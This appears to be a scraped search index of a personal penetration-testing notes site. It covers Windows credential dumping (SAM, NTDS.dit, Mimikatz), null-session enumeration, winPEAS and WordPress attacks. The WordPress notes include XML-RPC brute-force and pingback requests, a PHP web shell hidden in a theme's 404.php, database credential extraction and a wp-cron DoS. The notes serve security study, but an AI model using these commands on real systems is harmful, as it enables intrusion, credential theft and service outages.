        Microsoft introduced a security feature in Windows NT 4.0 to help improve the security of the SAM database against offline software cracking. This is the SYSKEY (syskey.exe) feature, which, when enabled, partially encrypts the hard disk copy of the SAM file so that the password hash values for all local accounts stored in the SAM are encrypted with a key.
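        With administrative privileges, the SAM and SYSTEM hives can be saved from the registry and the password hashes extracted offline; a minimal sketch (paths are examples):

        C:\\> reg save HKLM\\SAM C:\\Temp\\sam.save\nC:\\> reg save HKLM\\SYSTEM C:\\Temp\\system.save\n\n# On the attacker machine, extract the hashes with impacket\nsecretsdump.py -sam sam.save -system system.save LOCAL\n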

        Credential Manager is a feature built into all Windows operating systems that allows users to save the credentials they use to access various network resources and websites. Saved credentials are stored per user profile in each user's Credential Locker. Credentials are encrypted and stored at the following location:

        PS C:\\Users\\[Username]\\AppData\\Local\\Microsoft\\[Vault/Credentials]\\\n
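        A quick way to see what is stored there is cmdkey; a saved entry can then be reused with runas:

        C:\\> cmdkey /list\n\n# Run a command as a user whose credential is saved in the Credential Manager\nC:\\> runas /savecred /user:<DOMAIN>\\<USER> cmd.exe\n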
        ","tags":["windows"]},{"location":"windows-credentials-storage/#domain-controllers","title":"Domain Controllers","text":"

        Each Domain Controller hosts a file called NTDS.dit that is kept synchronized across all Domain Controllers with the exception of Read-Only Domain Controllers. NTDS.dit is a database file that stores the data in Active Directory, including but not limited to:

        • User accounts (username & password hash)
        • Group accounts
        • Computer accounts
        • Group policy objects
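        On a Domain Controller with sufficient privileges, a common way to obtain a consistent copy of NTDS.dit is ntdsutil's IFM (Install From Media) feature; a sketch (output path is an example):

        C:\\> ntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\Temp\\ntds_dump\" q q\n\n# On the attacker machine, extract the hashes offline with impacket\nsecretsdump.py -ntds ntds.dit -system SYSTEM LOCAL\n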
        ","tags":["windows"]},{"location":"windows-credentials-storage/#tools-for-dumping-credentials","title":"Tools for dumping credentials","text":"
        • CrackMapExec.
        • John The Ripper.
        • Hydra.
        • Metasploit.
        • Mimikatz.
        • pypykatz.
        • Lazagne.
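        For instance, dumping logon passwords from LSASS memory with Mimikatz (requires administrative privileges):

        mimikatz # privilege::debug\nmimikatz # sekurlsa::logonpasswords\n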
        ","tags":["windows"]},{"location":"windows-credentials-storage/#findstr","title":"findstr","text":"

        We can also use findstr to search for patterns across many types of files.

        C:\\> findstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
        ","tags":["windows"]},{"location":"windows-null-session-attack/","title":"Windows Null session attack","text":"

        It is used to enumerate information (passwords, system users, system groups, running system processes). A null session attack exploits an authentication vulnerability in Windows administrative shares. This lets an attacker connect to a local or remote share without authentication.

        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-windows","title":"Manually from Windows","text":"
        1. Enumerate File Server services:
        nbtstat -A $ip\n\n# ELS-WINXP   <00>   UNIQUE   Registered\n# <00> tells us ELS-WINXP is a workstation\n# <20> says that the file sharing service is up and running on the machine\n# UNIQUE tells us that this computer must have only one IP address assigned\n
        2. Enumerate Windows shares. Once we spot a machine with the File Server service running, we can enumerate:
        NET VIEW $ip\n
        3. Verify if a null session attack is possible by exploiting the IPC$ administrative share and trying to connect without valid credentials:
        NET USE \\\\$ip\\IPC$ \"\" /u:\"\"\n

        This tells Windows to connect to the IPC$ share using an empty password and an empty username. It only works with IPC$ (not C$).

        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-linux","title":"Manually from Linux","text":"

        Using the samba suite: https://www.samba.org/

        1. Enumerate File Server services:
        nmblookup -A $ip\n
        2. With smbclient we can also enumerate the shares provided by a host:
        smbclient -L //$ip -N\n\n# -L  Look at what services are available on a target\n# $ip  Prepend the two slashes\n# -N  Force the tool not to ask for a password\n
        3. Connect:
        smbclient \\\\$ip\\sharedfolder -N\n

        Be careful, sometimes the shell removes the slashes and you need to escape them.

        4. Once connected, you can browse with the smb command line. To see allowed commands: help
        5. When you know the path of a file and you want to retrieve it:

          • from kali:
            smbget smb://$ip/SharedFolder/flag_1.txt\n
          • from smb command line:
            get flag_1.txt\n
        6. To map users with permissions

        smbmap -H demo.ine.local\n

        To get a specific file in a connection: get flag.txt

        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#tricks","title":"Tricks","text":"

        Enumerate users with enum4linux -U demo.ine.local

        Enumerate the permissions of users with smbmap -H demo.ine.local

        If some users are missing in the permission list, maybe they are accessible; try with:

        smbclient -L //$ip\\<user> -N\n
        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#more-tools","title":"More tools","text":"
        • Winfo.
        • enum.
        • enum4linux.
        • SAMRDump.
        ","tags":["pentesting windows"]},{"location":"windows-privilege-escalation-history/","title":"Windows: Privilege Escalation - Recently accessed files and executed commands","text":"

        Check recently accessed files and executed commands. By default, the PowerShell console history is saved in:

        C:\\Users\\<account_name>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n
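        From a PowerShell session, the same file can be located and read regardless of the profile path:

        Get-Content (Get-PSReadlineOption).HistorySavePath\n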
        ","tags":["windows","privilege escalation"]},{"location":"winfo/","title":"Winfo","text":"

        Winfo uses Null Session attacks to retrieve account and share information from Windows NT.

        ","tags":["pentesting windows"]},{"location":"winfo/#installation","title":"Installation","text":"

        Download it from: https://packetstormsecurity.com/search/?q=winfo&s=files.

        ","tags":["pentesting windows"]},{"location":"winfo/#basic-command","title":"Basic command","text":"
        winfo.exe $ip -n\n
        ","tags":["pentesting windows"]},{"location":"winpeas/","title":"Windows Privilege Escalation Awesome Scripts: winPEAS","text":"

        That is exactly what winPEAS stands for: Windows Privilege Escalation Awesome Scripts.

        Download it from https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS.

        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#what-it-does","title":"What it does","text":"
        • Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz, which I'm copying below.
        • Provide information about how to exploit misconfigurations.

        In the GitHub repo, you will see two files: a .bat and an .exe version.
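        A typical workflow (filenames and IP are illustrative) is to serve the binary from the attack box and run it on the target:

        # Attacker: serve the binary\npython3 -m http.server 80\n\n# Target (PowerShell): download and run it\niwr -Uri http://<ATTACKER_IP>/winPEASx64.exe -OutFile winPEAS.exe\n.\\winPEAS.exe\n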

        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#checklist-for-local-windows-privilege-escalation","title":"Checklist for Local windows Privilege Escalation","text":"

        Source: winPEAS README.md file.

        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#system-info","title":"System Info","text":"
        • Obtain System information
        • Search for kernel exploits using scripts.
        • Use Google to search for kernel exploits
        • Use searchsploit to search for kernel exploits
        • Interesting info in env vars?
        • Passwords in PowerShell history?
        • Interesting info in Internet settings?
        • Drives
        • WSUS exploit?
        • AlwaysInstallElevated?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#loggingav-enumeration","title":"Logging/AV enumeration","text":"
        • Check Audit and WEF
        • Check LAPS
        • Check if WDigest is active
        • LSA Protection?
        • Credentials Guard
        • Cached Credentials?
        • Check if any AV
        • AppLocker Policy?
        • UAC
        • User Privileges
        • Check current user privilege
        • Are you member of any privileged group
        • Check if you have any of these tokens enabled: SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege?
        • Users Sessions?
        • Check users homes (access?)
        • Check Password Policy
        • What is inside the Clipboard?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network","title":"Network","text":"
        • Check current network information
        • Check hidden local services restricted to the outside
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#running-processes","title":"Running Processes","text":"
        • Processes binaries file and folders permission
        • Memory Password mining
        • Insecure GUI apps
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#services","title":"Services","text":"
        • Can you modify any service
        • Can you modify the binary that is executed by any service
        • Can you modify the registry of any service
        • Can you take advantage of any unquoted service binary path
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#applications","title":"Applications","text":"
        • Write permissions on installed applications
        • Startup Applications
        • Vulnerable Drivers
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#dll-hijacking","title":"DLL Hijacking","text":"
        • Can you write in any folder inside PATH?
        • Is there any known service binary that tries to load any non-existent DLL?
        • Can you write in any binaries folder?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network_1","title":"Network","text":"
        • Enumerate the network (shares, interfaces, routes, neighbours, ...)
        • Take a special look at network services listening on localhost (127.0.0.1)
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#windows-credentials","title":"Windows Credentials","text":"
        • Winlogon.
        • Windows Vault.
        • Interesting DPAPI credentials.
        • Passwords of saved Wifi networks.
        • Interesting info in saved RDP Connections.
        • Passwords in recently run commands.
        • Remote Desktop Credentials Manager.
        • AppCmd.exe exists.
        • SCClient.exe.
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#files-and-registry-credentials","title":"Files and Registry (Credentials)","text":"
        • Putty: Creds.
        • SSH keys in registry.
        • Passwords in unattended files.
        • Any SAM & SYSTEM.
        • Cloud credentials.
        • McAfee SiteList.xml.
        • Cached GPP Password?
        • Password in IIS Web config file.
        • Interesting info in web logs.
        • Do you want to ask for credentials
        • Interesting files inside the Recycle Bin.
        • Other registry containing credentials.
        • Inside Browser data.
        • Generic password search.
        • Tools.
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#leaked-handlers","title":"Leaked Handlers","text":"
        • Have you access to any handler of a process run by administrator?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#pipe-client-impersonation","title":"Pipe Client Impersonation","text":"","tags":["windows","privilege escalation"]},{"location":"winspy/","title":"winspy - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"winspy/#installation","title":"Installation","text":"

        Download it from https://www.catch22.net/software/winspy

        ","tags":["pentesting","windows","thick client"]},{"location":"winspy/#what-it-does","title":"What it does","text":"

        Basically, WinSpy allows us to select and view the properties of any window in the system. It is based on the Spy++ utility that ships with Microsoft Visual Studio.

        It allows us to retrieve passwords from password-edit controls.


        Here is a list of all the window properties it retrieves:

        • Window Class and Name.
        • Window procedure address.
        • All window styles and extended styles.
        • Window properties (set using the SetProp API call).
        • Complete Child and Sibling window relationships.
        • Scrollbar positional information.
        • Full window Class information.
        • Retrieve passwords from password-edit controls!
        • Edit window styles!
        • Alter window captions!
        • Show / Hide / Enable / Disable / Adjust any window in the system!
        • Massively improved user-interface!
        • View the complete system window hierarchy!
        • Multi-monitor support!
        • Now works correctly for all versions of Windows.
        • Tree hierarchy now groups by process.
        ","tags":["pentesting","windows","thick client"]},{"location":"wireless-security/","title":"Wireless security","text":""},{"location":"wireless-security/#basic-concepts","title":"Basic concepts","text":"Name Explanation MAC address A unique identifier for the device's wireless adapter. SSID The network name, also known as the Service Set Identifier of the WiFi network. Supported data rates A list of the data rates the device can communicate. Supported channels A list of the channels (frequencies) on which the device can communicate. Supported security protocols A list of the security protocols that the device is capable of using, such as WPA2/WPA3.

        Wired Equivalent Privacy: WEP

        Wi-Fi Protected Access: WPA

        "},{"location":"wireless-security/#wep-challenge-response-handshake","title":"WEP Challenge-Response Handshake","text":"Step Who Description 1 Client Sends an association request packet to the WAP, requesting access. 2 WAP Responds with an association response packet to the client, which includes a challenge string. 3 Client Calculates a response to the challenge string and a shared secret key and sends it back to the WAP. 4 WAP Calculates the expected response to the challenge with the same shared secret key and sends an authentication response packet to the client.

        Nevertheless, some packets can get lost, so the so-called CRC checksum has been integrated. Cyclic Redundancy Check (CRC) is an error-detection mechanism used in the WEP protocol to protect against data corruption in wireless communications.

        "},{"location":"wireless-security/#encryption-protocols","title":"Encryption Protocols","text":"

        We can use various encryption algorithms to protect the confidentiality of data transmitted over wireless networks. The most common encryption algorithms in WiFi networks are Wired Equivalent Privacy (WEP), WiFi Protected Access 2 (WPA2), and WiFi Protected Access 3 (WPA3).

        "},{"location":"wireless-security/#wired-equivalent-privacy-wep","title":"Wired Equivalent Privacy: WEP","text":"

        Very weak, with 64-bit and 128-bit encryption keys.

        WEP uses the RC4 cipher encryption algorithm, which makes it vulnerable to attacks.

        Passwords can be cracked in minutes.

        Superseded by WPA in 2003

        "},{"location":"wireless-security/#wi-fi-protected-access-wpa","title":"Wi-Fi Protected Access: WPA","text":"

        Developed by the Wi-Fi Alliance.

        Massive security improvement over WEP with 256-bit encryption keys.

        Superseded by WPA2 in 2006.

        "},{"location":"wmctrl/","title":"wmctrl","text":"
        sudo apt-get install wmctrl\n
        #!/bin/bash\n# Switch to workspace 0, launch the apps, then move each window to its own workspace\nwmctrl -s 0\n/bin/bash\nfirefox https://enterprise.hackthebox.com/login &\nobsidian &\ngoogle-chrome &\nriseup-vpn --start-vpn on\nsleep 5\nwmctrl -r /bin/bash -t 0\nwmctrl -r firefox -t 1\nwmctrl -r obsidian -t 2\nwmctrl -r riseup-vpn -t 3\nwmctrl -s 0\n
        "},{"location":"wordpress-pentesting/","title":"Pentesting wordpress","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#important-wordpress-files-and-directories","title":"Important wordpress files and directories","text":"

        Login/Authentication

        • /wp-login.php (This is usually changed to /login.php for security)
        • /wp-admin/login.php
        • /wp-admin/wp-login.php
        • xmlrpc.php - (Extensible Markup Language - Remote Procedure Call) is a protocol that allows external applications and services to interact with a WordPress site programmatically. This has been replaced by the WordPress REST API.

        Directories

        • /wp-content - Primary directory used to store plugins and themes.
        • /wp-content/uploads/ - Directory where uploaded files are stored (Usually prone to directory listing).
        • /wp-config.php - Contains information required by WordPress to connect to a database. (Contains database credentials)
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#dorking-techniques","title":"Dorking techniques","text":"
        inurl:\"/xmlrpc.php?rsd\" + scoping restrictions\n\nintitle:\"WordPress\" inurl:\"readme.html\" + scoping restrictions = general wordpress detection\n\nallinurl:\"wp-content/plugins/\" + scoping restrictions = general wordpress detection\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-version","title":"Wordpress version","text":"
        # Using curl to get the generator meta tag\ncurl -s -X GET https://example.com | grep '<meta name=\"generator\"'\n\n# Using curl to get the version from src files\ncurl -s -X GET <URL> | grep http | grep -E '?ver' | sed -E 's,href=|src=,THIIIIS,g' | awk -F \"THIIIIS\" '{print $2}' | cut -d \"'\" -f2\n

        Manual techniques

        • Check WordPress Meta Generator Tag.
        • Check the WordPress readme.html/license.txt file.
        • Inspect HTTP response headers for version information (X-Powered-By).
        • Check the login page for the WordPress version as it is usually displayed.
        • Check the WordPress REST API and look for the version field in the JSON response (http://example.com/wp-json/)
        • Analyze JS and CSS files for version information.
        • Examine the WordPress changelog files with information on version updates. Look for files like changelog.txt or readme.txt in the WordPress directory
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#plugin-enumeration","title":"Plugin enumeration","text":"
        # curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'wp-content/plugins/*' | cut -d\"'\" -f2\n\n# wpscan\nwpscan --url http://<TARGET> --plugins-detection passive\n# Modes: -mixed (default), -passive or -active\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#themes-enumeration","title":"Themes enumeration","text":"
        # Using curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'themes' | cut -d\"'\" -f2\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#user-enumeration","title":"User enumeration","text":"
        # Using curl\ncurl -s -I -X GET http://blog.inlanefreight.com/?author=1\n\n# json enumeration\ncurl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq\n\n# wpscan\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -eu\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\n

        Manual method: WordPress users have unique numeric identifiers; usually the first user has ID 1, the second ID 2. So in the browser you can request:

        http://example.com/wordpressPath?author=1\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#nmap-enumeration","title":"nmap enumeration","text":"
        # List nmap scripts related to wordpress\nls -la /usr/share/nmap/scripts | grep wordpress\n

        Results:

        -rw-r--r-- 1 root root  5061 Nov  1 22:10 http-wordpress-brute.nse\n-rw-r--r-- 1 root root 10866 Nov  1 22:10 http-wordpress-enum.nse\n-rw-r--r-- 1 root root  4641 Nov  1 22:10 http-wordpress-users.nse\n

        Running one of them:

        # General enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum <TARGETwithnohttp> \n\n# Plugins enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum --script-args type=\"plugins\" <TARGETwithnohttp> -p 80,443\n\n# User enumeration\nsudo nmap -sS -sV --script=http-wordpress-users <TARGETwithnohttp> \n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#brute-force-attack-on-login","title":"Brute force attack on login","text":"

        Usually, the login form is located at example.com/wp-login.php (requests to /wp-admin/ redirect there).

        But sometimes the login form is hidden under a different path; there are plugins that do this.

        # Brute force attack with passwords\nwpscan --url HOST/domain --usernames admin,webadmin --password-attack wp-login --passwords filename.txt\n# --usernames: the users you are going to brute force\n# --password-attack: the attack target (different in the case of the WP API)\n# --passwords: path/to/dictionary.txt\n\nwpscan --url <targetURLnohttp> -U admin -P /usr/share/wordlists/rockyou.txt\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumerating-files-and-folders","title":"Enumerating files and folders","text":"
        # Using gobuster\ngobuster dir --url https://example.com --wordlist /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -b '404'\n

        Check out if directory listing is enabled.

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-xmlrpc-attacks","title":"WordPress xmlrpc attacks","text":"

        XML-RPC on WordPress is an API that gives developers of third-party applications and services the ability to interact with a WordPress site programmatically. The XML-RPC API that WordPress provides covers several key functionalities, including:

        • Publish a post.
        • Edit a post.
        • Delete a post.
        • Upload a new file (e.g. an image for a post).
        • Get a list of comments.
        • Edit comments.

        XML-RPC functionality has been turned on by default since WordPress 3.5. Therefore, a default WordPress installation allows us to perform two types of attacks:

        • XML-rpc ping attacks.
        • Brute force attack.

        Before attacking, we need to make sure that XML-RPC is enabled on the WordPress installation:

        1. Ensure you have access to the xmlrpc.php file (usually at https://example.com/xmlrpc.php).

        2. Send a POST request:

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 135\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<methodCall> \n<methodName>system.listMethods</methodName> \n<params></params> \n</methodCall>\n

        Same request with curl would be:

        curl -X POST -d \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?> <methodCall> <methodName>system.listMethods</methodName> <params></params></methodCall>\" http://example.com/xmlrpc.php\n

        The normal response to this request lists all available methods.

        This is how you trigger the blogger.getUsersBlogs method:
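        A sketch of that request (credentials are placeholders; blogger.getUsersBlogs takes an app key as its first parameter, which WordPress ignores):

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n<methodName>blogger.getUsersBlogs</methodName>\n<params>\n<param><value><string>appkey</string></value></param>\n<param><value><string>admin</string></value></param>\n<param><value><string>password</string></value></param>\n</params>\n</methodCall>\n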

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-brute-force-attack","title":"XML-RPC brute force attack","text":"

        With wpscan:

        wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://<TARGET>\n

        Use BurpSuite Intruder to send this request:

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 235\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall> \n<methodName>wp.getUsersBlogs</methodName> \n<params> \n<param><value>\\{\\{your username\\}\\}</value></param> \n<param><value>\\{\\{your password\\}\\}</value></param> \n</params> \n</methodCall>\n

        You can also perform a single request, and brute force hundreds of passwords. For that you need to use both system.multicall and wp.getUsersBlogs methods:

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 1560\n\n<?xml version=\"1.0\"?>\n<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n</data></array></value></param></params></methodCall>\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-uploading-a-file","title":"XML-RPC uploading a file","text":"

        With correct credentials you can upload a file. The path will appear in the response (source: HackTricks):

        <?xml version='1.0' encoding='utf-8'?>\n<methodCall>\n    <methodName>wp.uploadFile</methodName>\n    <params>\n        <param><value><string>1</string></value></param>\n        <param><value><string>username</string></value></param>\n        <param><value><string>password</string></value></param>\n        <param>\n            <value>\n                <struct>\n                    <member>\n                        <name>name</name>\n                        <value><string>filename.jpg</string></value>\n                    </member>\n                    <member>\n                        <name>type</name>\n                        <value><string>mime/type</string></value>\n                    </member>\n                    <member>\n                        <name>bits</name>\n                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>\n                    </member>\n                </struct>\n            </value>\n        </param>\n    </params>\n</methodCall>\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-distributed-denial-of-service-ddos-attacks","title":"XML-RPC pingback attack: Distributed denial-of-service (DDoS) attacks","text":"

        An attacker executes the pingback.ping method from several affected WordPress installations against a single unprotected target (botnet level).

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-cloudflare-protection-bypass","title":"XML-RPC pingback attack: Cloudflare Protection Bypass","text":"

        An attacker executes the pingback.ping method from a single affected WordPress installation, which is protected by Cloudflare, to an attacker-controlled public host (for example a VPS) in order to reveal the public IP of the target, thereby bypassing any DNS-level protection.

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-xspa-cross-site-port-attack","title":"XML-RPC pingback attack: XSPA (Cross Site Port Attack)","text":"

        An attacker can execute the pingback.ping method from a single affected WordPress installation to the same host (or another internal/private host) on different ports. An open port or an internal host can be determined by observing differences in response time and/or by looking at the response to the request.

        The following is a simple example request, using the Burp Suite Collaborator URL as the callback:

        POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 303\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n<methodName>pingback.ping</methodName>\n<params>\n<param>\n<value><string>https://pdaskjdasas23fselrkfdsf.oastify.com/1562017983221-4377199190203</string></value>\n</param>\n<param>\n<value><string>https://example.com/</string></value>\n</param>\n</params>\n</methodCall>\n
        # Brute force with curl\ncurl -X POST -d \"<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>\" http://blog.inlanefreight.com/xmlrpc.php\n\n# If the credentials are not valid, we will receive a 403 faultCode error.\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#rce-attack-on-wordpress","title":"RCE attack on wordpress","text":"

        Once you have credentials for the admin user, access the admin panel and introduce a web shell. Where? Appearance > Theme Editor. Choose a theme not in use and edit 404.php to add the shell; this is a quiet way to avoid being noticed.

        At the end of the file, you can add:

        system($_GET['cmd']);\n

        Exploitation:

        curl -X GET \"http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id\"\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#metasploit-modules","title":"Metasploit modules","text":"
        use exploit/unix/webapp/wp_admin_shell_upload\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#interesting-files","title":"Interesting files","text":"

        If we somehow get our hands on wp-config.php, we will be able to see the database credentials.

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#post-exploitation","title":"Post Exploitation","text":"

        Extract usernames and passwords:

        mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;\"\n

        Change admin password:

        mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;\"\n
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wp-cronphp-attack","title":"wp-cron.php attack","text":"

        The WordPress application is vulnerable to a Denial of Service (DoS) attack via the wp-cron.php script. This script is used by WordPress to perform scheduled tasks, such as publishing scheduled posts, checking for updates, and running plugins.

        An attacker can exploit this vulnerability by sending a large number of requests to the wp-cron.php script, causing it to consume excessive resources and overload the server. This can lead to the application becoming unresponsive or crashing, potentially causing data loss and downtime.

        Steps to Reproduce:

        • Get the doser.py script at https://github.com/Quitten/doser.py
        • Use this command to run the script:
        python3 doser.py -t 999 -g 'https://\u2588\u2588\u2588\u2588\u2588/wp-cron.php'\n
        • Go to https://\u2588\u2588\u2588\u2588 after 1000 requests of the doser.py script. The site returns code 502. See the video PoC.

        To mitigate this vulnerability, it is recommended to disable the default WordPress wp-cron.php script and set up a server-side cron job instead. Here are the steps to disable the default wp-cron.php script and set up a server-side cron job:

        1. Access your website\u2019s root directory via FTP or cPanel File Manager.
        2. Locate the wp-config.php file and open it for editing.
        3. Add the following line of code to the file, just before the line that says \u201cThat\u2019s all, stop editing! Happy publishing.\u201d:
        define('DISABLE_WP_CRON', true);\n
        4. Save the changes to the wp-config.php file.
        5. Set up a server-side cron job to run the wp-cron.php script at the desired interval (see the sketch below). This can be done using the server's control panel or by editing the server's crontab file.
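
        A possible crontab entry for the server-side job; a minimal sketch assuming a 15-minute interval and a placeholder domain:

        */15 * * * * wget -q -O - https://example.com/wp-cron.php?doing_wp_cron >/dev/null 2>&1\n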
        ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#tools","title":"Tools","text":"

        wpscan

        ","tags":["wordpress","pentesting","CMS"]},{"location":"wpscan/","title":"wpscan - Wordpress Security Scanner","text":"","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#installation","title":"Installation","text":"

        Preinstalled in Kali.

        See the repo: https://github.com/wpscanteam/wpscan.

        WPScan keeps a local database of metadata that is used to output useful information, such as the latest version of a plugin. The local database can be updated with the following command:

        wpscan --update\n
        ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#basic-commands","title":"Basic commands","text":"
        # Enumerate users\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -e u\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\nwpscan --url http://46.101.13.204:31822 --plugins-detection passive\n\n# Brute force attack on login page with passwords:\nwpscan --url HOST/domain --usernames admin,webadmin --password-attack wp-login --passwords filename.txt\n# --usernames: the users that you are going to brute force\n# --password-attack: your URI target (different in the case of the WP API)\n# --passwords: path/to/dictionary.txt\n\n# Brute force attack on xmlrpc with passwords:\nwpscan --password-attack xmlrpc -t 20 -U username1,username2 -P PATH/TO/passwords.txt --url http://<TARGET>\n\n# Enumerate plugins in passive mode\nwpscan --url https://target.tld/ --plugins-detection passive\n# Modes: mixed (default), passive or active\n\n# Common values for --enumerate (-e)\n#   vp (Vulnerable plugins)\n#   ap (All plugins)\n#   p (Popular plugins)\n#   vt (Vulnerable themes)\n#   at (All themes)\n#   t (Popular themes)\n#   tt (Timthumbs)\n#   cb (Config backups)\n#   dbe (Db exports)\n#   u (User IDs range. e.g: u1-5)\n#   m (Media IDs range. e.g m1-15)\n\n# Ignore HTTPS certificate\n--disable-tls-checks\n
        ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#examples-from-labs","title":"Examples from labs:","text":"
        # Raven 1 machine\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n
        ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"xfreerdp/","title":"xfreerdp","text":"

        xfreerdp is an X11 Remote Desktop Protocol (RDP) client which is part of the FreeRDP project. An RDP server is built into many editions of Windows.

        ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#installation","title":"Installation","text":"

        To install xfreerdp, proceed with the following command:

        sudo apt-get install freerdp2-x11\n
        ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#basic-commands","title":"Basic commands","text":"
